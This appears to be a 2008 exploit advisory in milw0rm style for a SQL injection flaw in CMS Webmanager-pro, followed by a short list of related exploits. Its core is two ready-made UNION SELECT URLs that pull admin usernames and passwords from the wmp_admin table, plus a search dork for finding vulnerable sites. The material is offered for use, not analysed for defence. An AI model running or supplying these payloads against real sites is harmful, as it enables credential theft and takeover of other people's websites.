:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.eu ]
##################################################################
# [ CMS Webmanager-pro ] Remote SQL Injection Vulnerability #
##################################################################
#
# Script site: http://webmanager-pro.com/
#
# Vuln:
# http://site.com/index.php?lang_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
# http://site.com/index.php?menu_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
#
# Dork example: "CMS Webmanager-pro"
#
###############################################
# Greetz: D3m0n_DE * sid_psycho * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# milw0rm.com [2008-05-18]
Related Exploits
Trying to match CVEs (1): CVE-2008-2351Trying to match OSVDBs (1): 45319
Other Possible E-DB Search Terms: CMS WebManager-Pro
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2010-10-30 |  |
|
CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection | MustLive |
| 2010-09-02 | |
|
CMS WebManager-Pro - 'c.php' SQL Injection | MustLive |